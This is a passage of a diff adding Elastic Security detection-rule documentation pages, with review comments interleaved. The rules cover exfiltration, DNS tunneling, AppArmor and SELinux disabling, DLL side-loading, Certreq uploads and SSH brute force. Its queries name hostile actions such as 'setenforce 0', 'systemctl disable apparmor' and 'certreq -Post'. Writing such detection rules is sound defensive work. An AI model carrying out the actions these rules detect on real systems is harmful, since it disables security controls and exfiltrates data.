a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-data-exfiltration-activity-to-an-unusual-ip-address.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-data-exfiltration-activity-to-an-unusual-ip-address.asciidoc new file mode 100644 index 0000000000..b1711af6c0 --- /dev/null 
+++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-data-exfiltration-activity-to-an-unusual-ip-address.asciidoc @@ -0,0 +1,58 @@ +[[prebuilt-rule-8-10-5-potential-data-exfiltration-activity-to-an-unusual-ip-address]] +=== Potential Data Exfiltration Activity to an Unusual IP Address + +A machine learning job has detected data exfiltration to a particular geo-location (by IP address). Data transfers to geo-locations that are outside the normal traffic patterns of an organization could indicate exfiltration over command and control channels. + +*Rule type*: machine_learning + +*Rule indices*: None + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 15m + +*Searches indices from*: now-6h ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html +* https://docs.elastic.co/en/integrations/ded + +*Tags*: + +* Use Case: Data Exfiltration Detection +* Rule Type: ML +* Rule Type: Machine Learning +* Tactic: Exfiltration + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Exfiltration +** ID: TA0010 +** Reference URL: https://attack.mitre.org/tactics/TA0010/ +* Technique: +** Name: Exfiltration Over C2 Channel +** ID: T1041 +** Reference URL: https://attack.mitre.org/techniques/T1041/ 
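Review bot: the `==== Investigation guide` section renders an empty `[source, markdown]` block (the two delimiter lines enclose nothing), so the page advertises guidance it does not contain; either populate it with triage steps for this machine learning job's output or drop the section. The same empty block appears in the neighbouring ML rule documents in this patch and should be handled the same way in each.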
diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-data-exfiltration-activity-to-an-unusual-iso-code.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-data-exfiltration-activity-to-an-unusual-iso-code.asciidoc new file mode 100644 index 0000000000..8b317d923d --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-data-exfiltration-activity-to-an-unusual-iso-code.asciidoc 
@@ -0,0 +1,58 @@ +[[prebuilt-rule-8-10-5-potential-data-exfiltration-activity-to-an-unusual-iso-code]] +=== Potential Data Exfiltration Activity to an Unusual ISO Code + +A machine learning job has detected data exfiltration to a particular geo-location (by region name). Data transfers to geo-locations that are outside the normal traffic patterns of an organization could indicate exfiltration over command and control channels. + +*Rule type*: machine_learning + +*Rule indices*: None + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 15m + +*Searches indices from*: now-6h ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html +* https://docs.elastic.co/en/integrations/ded + +*Tags*: + +* Use Case: Data Exfiltration Detection +* Rule Type: ML +* Rule Type: Machine Learning +* Tactic: Exfiltration + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Exfiltration +** ID: TA0010 +** Reference URL: https://attack.mitre.org/tactics/TA0010/ +* Technique: +** Name: Exfiltration Over C2 Channel +** ID: T1041 +** Reference URL: https://attack.mitre.org/techniques/T1041/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-data-exfiltration-activity-to-an-unusual-region.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-data-exfiltration-activity-to-an-unusual-region.asciidoc new file mode 100644 index 0000000000..baa02b7e4f --- /dev/null 
+++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-data-exfiltration-activity-to-an-unusual-region.asciidoc @@ -0,0 +1,58 @@ +[[prebuilt-rule-8-10-5-potential-data-exfiltration-activity-to-an-unusual-region]] +=== Potential Data Exfiltration Activity to an Unusual Region + +A machine learning job has detected data exfiltration to a particular geo-location (by region name). Data transfers to geo-locations that are outside the normal traffic patterns of an organization could indicate exfiltration over command and control channels. + +*Rule type*: machine_learning + +*Rule indices*: None + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 15m + +*Searches indices from*: now-6h ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html +* https://docs.elastic.co/en/integrations/ded + +*Tags*: + +* Use Case: Data Exfiltration Detection +* Rule Type: ML +* Rule Type: Machine Learning +* Tactic: Exfiltration + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Exfiltration +** ID: TA0010 +** Reference URL: https://attack.mitre.org/tactics/TA0010/ +* Technique: +** Name: Exfiltration Over C2 Channel +** ID: T1041 +** Reference URL: https://attack.mitre.org/techniques/T1041/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-defense-evasion-via-proot.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-defense-evasion-via-proot.asciidoc new file mode 100644 index 0000000000..d92d5417b0 --- /dev/null 
+++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-defense-evasion-via-proot.asciidoc 
@@ -0,0 +1,61 @@ +[[prebuilt-rule-8-10-5-potential-defense-evasion-via-proot]] +=== Potential Defense Evasion via PRoot + +Identifies the execution of the PRoot utility, an open-source tool for user-space implementation of chroot, mount --bind, and binfmt_misc. Adversaries can leverage an open-source tool PRoot to expand the scope of their operations to multiple Linux distributions and simplify their necessary efforts. In a normal threat scenario, the scope of an attack is limited by the varying configurations of each Linux distribution. With PRoot, it provides an attacker with a consistent operational environment across different Linux distributions, such as Ubuntu, Fedora, and Alpine. PRoot also provides emulation capabilities that allow for malware built on other architectures, such as ARM, to be run.The post-exploitation technique called bring your own filesystem (BYOF), can be used by the threat actors to execute malicious payload or elevate privileges or perform network scans or orchestrate another attack on the environment. Although PRoot was originally not developed with malicious intent it can be easily tuned to work for one. 
+ +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://proot-me.github.io/ + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Data Source: Elastic Defend + +*Version*: 4 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +process where event.action == "exec" and process.parent.name =="proot" and host.os.type == "linux" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Exploitation for Defense Evasion +** ID: T1211 +** Reference URL: https://attack.mitre.org/techniques/T1211/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-dga-activity.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-dga-activity.asciidoc new file mode 100644 index 0000000000..dcf7e5309c --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-dga-activity.asciidoc 
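Review bot: the description has a missing space in "to be run.The post-exploitation technique" and a dangling subject in "With PRoot, it provides an attacker with a consistent operational environment"; suggest "to be run. The post-exploitation technique ..." and "PRoot provides an attacker with a consistent operational environment ...". The closing sentence "it can be easily tuned to work for one" also reads awkwardly; "it can easily be repurposed for malicious use" keeps the meaning.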
@@ -0,0 +1,58 @@ +[[prebuilt-rule-8-10-5-potential-dga-activity]] +=== Potential DGA Activity + +A population analysis machine learning job detected potential DGA (domain generation algorithm) activity. Such activity is often used by malware command and control (C2) channels. This machine learning job looks for a source IP address making DNS requests that have an aggregate high probability of being DGA activity. + +*Rule type*: machine_learning + +*Rule indices*: None + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 15m + +*Searches indices from*: now-45m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html +* https://docs.elastic.co/en/integrations/dga + +*Tags*: + +* Use Case: Domain Generation Algorithm Detection +* Rule Type: ML +* Rule Type: Machine Learning +* Tactic: Command and Control + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Command and Control +** ID: TA0011 +** Reference URL: https://attack.mitre.org/tactics/TA0011/ +* Technique: +** Name: Dynamic Resolution +** ID: T1568 +** Reference URL: https://attack.mitre.org/techniques/T1568/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-disabling-of-apparmor.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-disabling-of-apparmor.asciidoc new file mode 100644 index 0000000000..15d1a95383 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-disabling-of-apparmor.asciidoc 
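Review bot: the `==== Investigation guide` section is an empty `[source, markdown]` block and should be filled or removed. The tag list also carries both `Rule Type: ML` and `Rule Type: Machine Learning`, which label the same thing twice; keep one unless the tag taxonomy requires both.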
@@ -0,0 +1,66 @@ +[[prebuilt-rule-8-10-5-potential-disabling-of-apparmor]] +=== Potential Disabling of AppArmor + +This rule monitors for potential attempts to disable AppArmor. AppArmor is a Linux security module that enforces fine-grained access control policies to restrict the actions and resources that specific applications and processes can access. Adversaries may disable security tools to avoid possible detection of their tools and activities. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Data Source: Elastic Defend + +*Version*: 2 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.action == "exec" and event.type == "start" and ( + (process.name == "systemctl" and process.args == "disable" and process.args == "apparmor") or + (process.name == "ln" and process.args : "/etc/apparmor.d/*" and process.args : "/etc/apparmor.d/disable/") +) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ +* Sub-technique: +** Name: Disable or Modify Tools +** ID: T1562.001 +** Reference URL: https://attack.mitre.org/techniques/T1562/001/ 
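Review bot: in the `ln` branch of the rule query, `process.args : "/etc/apparmor.d/disable/"` only matches when the destination is written exactly as the directory with a trailing slash; the same command with `/etc/apparmor.d/disable` or with the link file named under that directory is not covered. Suggest `process.args : ("/etc/apparmor.d/disable", "/etc/apparmor.d/disable/*")`. Likewise, `process.args == "apparmor"` in the `systemctl` branch does not match the `apparmor.service` unit name form; `process.args : ("apparmor", "apparmor.service")` closes that gap.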
diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-disabling-of-selinux.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-disabling-of-selinux.asciidoc new file mode 100644 index 0000000000..d3653b2912 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-disabling-of-selinux.asciidoc 
@@ -0,0 +1,66 @@ +[[prebuilt-rule-8-10-5-potential-disabling-of-selinux]] +=== Potential Disabling of SELinux + +Identifies potential attempts to disable Security-Enhanced Linux (SELinux), which is a Linux kernel security feature to support access control policies. Adversaries may disable security tools to avoid possible detection of their tools and activities. + +*Rule type*: query + +*Rule indices*: + +* auditbeat-* +* logs-endpoint.events.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 106 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +event.category:process and host.os.type:linux and event.type:(start or process_started) and process.name:setenforce and process.args:0 + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ +* Sub-technique: +** Name: Disable or Modify Tools +** ID: T1562.001 +** Reference URL: https://attack.mitre.org/techniques/T1562/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-dll-side-loading-via-trusted-microsoft-programs.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-dll-side-loading-via-trusted-microsoft-programs.asciidoc new file mode 100644 index 0000000000..1c4c4ca912 
--- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-dll-side-loading-via-trusted-microsoft-programs.asciidoc 
@@ -0,0 +1,89 @@ +[[prebuilt-rule-8-10-5-potential-dll-side-loading-via-trusted-microsoft-programs]] +=== Potential DLL Side-Loading via Trusted Microsoft Programs + +Identifies an instance of a Windows trusted program that is known to be vulnerable to DLL Search Order Hijacking starting after being renamed or from a non-standard path. This is uncommon behavior and may indicate an attempt to evade defenses via side loading a malicious DLL within the memory space of one of those processes. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Tactic: Execution +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 107 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and + process.pe.original_file_name in ("WinWord.exe", "EXPLORER.EXE", "w3wp.exe", "DISM.EXE") and + not (process.name : ("winword.exe", "explorer.exe", "w3wp.exe", "Dism.exe") or + process.executable : ("?:\\Windows\\explorer.exe", + "?:\\Program Files\\Microsoft Office\\root\\Office*\\WINWORD.EXE", + "?:\\Program Files?(x86)\\Microsoft Office\\root\\Office*\\WINWORD.EXE", + "?:\\Windows\\System32\\Dism.exe", + "?:\\Windows\\SysWOW64\\Dism.exe", + "?:\\Windows\\System32\\inetsrv\\w3wp.exe") + ) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* 
Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Masquerading +** ID: T1036 +** Reference URL: https://attack.mitre.org/techniques/T1036/ +* Technique: +** Name: Hijack Execution Flow +** ID: T1574 +** Reference URL: https://attack.mitre.org/techniques/T1574/ +* Sub-technique: +** Name: DLL Side-Loading +** ID: T1574.002 +** Reference URL: https://attack.mitre.org/techniques/T1574/002/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-dns-tunneling-via-nslookup.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-dns-tunneling-via-nslookup.asciidoc new file mode 100644 index 0000000000..50079d097c --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-dns-tunneling-via-nslookup.asciidoc 
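Review bot: the `==== Investigation guide` section is an empty `[source, markdown]` block; fill it or remove the section. In the rule query, the `process.executable` allowlist entry `"?:\\Program Files?(x86)\\Microsoft Office\\root\\Office*\\WINWORD.EXE"` uses the single-character `?` wildcard in place of the space before `(x86)`; at first glance it reads as a typo, so a brief note in the document (or the literal `Program Files (x86)` form) would make the intent clear to readers.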
@@ -0,0 +1,115 @@ +[[prebuilt-rule-8-10-5-potential-dns-tunneling-via-nslookup]] +=== Potential DNS Tunneling via NsLookup + +This rule identifies a large number (15) of nslookup.exe executions with an explicit query type from the same host. This may indicate command and control activity utilizing the DNS protocol. + +*Rule type*: threshold + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://unit42.paloaltonetworks.com/dns-tunneling-in-the-wild-overview-of-oilrigs-dns-tunneling/ + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Command and Control +* Resources: Investigation Guide +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 107 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Potential DNS Tunneling via NsLookup + +Attackers can abuse existing network rules that allow DNS communication with external resources to use the protocol as their command and control and/or exfiltration channel. + +DNS queries can be used to infiltrate data such as commands to be run, malicious files, etc., and also for exfiltration, since queries can be used to send data to the attacker-controlled DNS server. This process is commonly known as DNS tunneling. + +More information on how tunneling works and how it can be abused can be found on [Palo Alto Unit42 Research](https://unit42.paloaltonetworks.com/dns-tunneling-how-dns-can-be-abused-by-malicious-actors). 
+ +#### Possible investigation steps + +- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Inspect the DNS query and identify the information sent. +- Extract this communication's indicators of compromise (IoCs) and use traffic logs to search for other potentially compromised hosts. + +### False positive analysis + +- This mechanism can be used legitimately. If the parent process is trusted and the data sent is not sensitive nor command and control related, this alert can be closed. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- Immediately block the identified indicators of compromise (IoCs). +- Implement any temporary network rules, procedures, and segmentation required to contain the attack. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Update firewall rules to be more restrictive. +- Reimage the host operating system or restore the compromised files to clean versions. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). 
+ +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +event.category:process and host.os.type:windows and event.type:start and process.name:nslookup.exe and process.args:(-querytype=* or -qt=* or -q=* or -type=*) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Command and Control +** ID: TA0011 +** Reference URL: https://attack.mitre.org/tactics/TA0011/ +* Technique: +** Name: Application Layer Protocol +** ID: T1071 +** Reference URL: https://attack.mitre.org/techniques/T1071/ +* Sub-technique: +** Name: DNS +** ID: T1071.004 +** Reference URL: https://attack.mitre.org/techniques/T1071/004/ +* Technique: +** Name: Protocol Tunneling +** ID: T1572 +** Reference URL: https://attack.mitre.org/techniques/T1572/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-external-linux-ssh-brute-force-detected.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-external-linux-ssh-brute-force-detected.asciidoc new file mode 100644 index 0000000000..98b6329730 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-external-linux-ssh-brute-force-detected.asciidoc 
@@ -0,0 +1,118 @@ +[[prebuilt-rule-8-10-5-potential-external-linux-ssh-brute-force-detected]] +=== Potential External Linux SSH Brute Force Detected + +Identifies multiple external consecutive login failures targeting a user account from the same source address within a short time interval. Adversaries will often brute force login attempts across multiple users with a common or known password, in an attempt to gain access to these accounts. + +*Rule type*: eql + +*Rule indices*: + +* logs-system.auth-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 5 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Credential Access + +*Version*: 4 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Potential External Linux SSH Brute Force Detected + +The rule identifies consecutive SSH login failures targeting a user account from the same source IP address to the same target host indicating brute force login attempts. + +This rule will generate a lot of noise for systems with a front-facing SSH service, as adversaries scan the internet for remotely accessible SSH services and try to brute force them to gain unauthorized access. + +In case this rule generates too much noise and external brute forcing is of not much interest, consider turning this rule off and enabling "Potential Internal Linux SSH Brute Force Detected" to detect internal brute force attempts. + +#### Possible investigation steps + +- Investigate the login failure user name(s). +- Investigate the source IP address of the failed ssh login attempt(s). 
+- Investigate other alerts associated with the user/host during the past 48 hours. +- Identify the source and the target computer and their roles in the IT environment. + +### False positive analysis + +- Authentication misconfiguration or obsolete credentials. +- Service account password expired. +- Infrastructure or availability issue. + +### Related Rules + +- Potential Internal Linux SSH Brute Force Detected - 1c27fa22-7727-4dd3-81c0-de6da5555feb +- Potential SSH Password Guessing - 8cb84371-d053-4f4f-bce0-c74990e28f28 + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved hosts to prevent further post-compromise behavior. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). 
+ + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +sequence by host.id, source.ip, user.name with maxspan=15s + [ authentication where host.os.type == "linux" and + event.action in ("ssh_login", "user_login") and event.outcome == "failure" and + not cidrmatch(source.ip, "10.0.0.0/8", "127.0.0.0/8", "169.254.0.0/16", "172.16.0.0/12", "192.0.0.0/24", + "192.0.0.0/29", "192.0.0.8/32", "192.0.0.9/32", "192.0.0.10/32", "192.0.0.170/32", "192.0.0.171/32", + "192.0.2.0/24", "192.31.196.0/24", "192.52.193.0/24", "192.168.0.0/16", "192.88.99.0/24", "224.0.0.0/4", + "100.64.0.0/10", "192.175.48.0/24","198.18.0.0/15", "198.51.100.0/24", "203.0.113.0/24", "240.0.0.0/4", + "::1", "FE80::/10", "FF00::/8") ] with runs = 10 + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Brute Force +** ID: T1110 +** Reference URL: https://attack.mitre.org/techniques/T1110/ +* Sub-technique: +** Name: Password Guessing +** ID: T1110.001 +** Reference URL: https://attack.mitre.org/techniques/T1110/001/ +* Sub-technique: +** Name: Password Spraying +** ID: T1110.003 +** Reference URL: https://attack.mitre.org/techniques/T1110/003/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-file-transfer-via-certreq.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-file-transfer-via-certreq.asciidoc new file mode 100644 index 0000000000..fc8c16ce65 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-file-transfer-via-certreq.asciidoc 
@@ -0,0 +1,84 @@ +[[prebuilt-rule-8-10-5-potential-file-transfer-via-certreq]] +=== Potential File Transfer via Certreq + +Identifies Certreq making an HTTP Post request. Adversaries could abuse Certreq to download files or upload data to a remote URL. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://lolbas-project.github.io/lolbas/Binaries/Certreq/ + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Tactic: Command and Control +* Tactic: Exfiltration +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 5 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and + (process.name : "CertReq.exe" or process.pe.original_file_name == "CertReq.exe") and process.args : "-Post" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Command and Control +** ID: TA0011 +** Reference URL: https://attack.mitre.org/tactics/TA0011/ +* Technique: +** Name: Ingress Tool Transfer +** ID: T1105 +** Reference URL: https://attack.mitre.org/techniques/T1105/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: System Binary Proxy Execution +** ID: T1218 +** Reference URL: https://attack.mitre.org/techniques/T1218/ +* Tactic: +** Name: Exfiltration +** ID: TA0010 +** Reference URL: https://attack.mitre.org/tactics/TA0010/ +* Technique: +** Name: Exfiltration Over Web Service +** ID: T1567 +** 
Reference URL: https://attack.mitre.org/techniques/T1567/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-hidden-process-via-mount-hidepid.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-hidden-process-via-mount-hidepid.asciidoc new file mode 100644 index 0000000000..eec90508bc --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-hidden-process-via-mount-hidepid.asciidoc 
@@ -0,0 +1,62 @@ +[[prebuilt-rule-8-10-5-potential-hidden-process-via-mount-hidepid]] +=== Potential Hidden Process via Mount Hidepid + +Identifies the execution of mount process with hidepid parameter, which can make processes invisible to other users from the system. Adversaries using Linux kernel version 3.2+ (or RHEL/CentOS v6.5+ above) can hide the process from other users. When hidepid=2 option is executed to mount the /proc filesystem, only the root user can see all processes and the logged-in user can only see their own process. This provides a defense evasion mechanism for the adversaries to hide their process executions from all other commands such as ps, top, pgrep and more. With the Linux kernel hardening hidepid option all the user has to do is remount the /proc filesystem with the option, which can now be monitored and detected. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.cyberciti.biz/faq/linux-hide-processes-from-other-users/ + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Data Source: Elastic Defend + +*Version*: 4 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +process 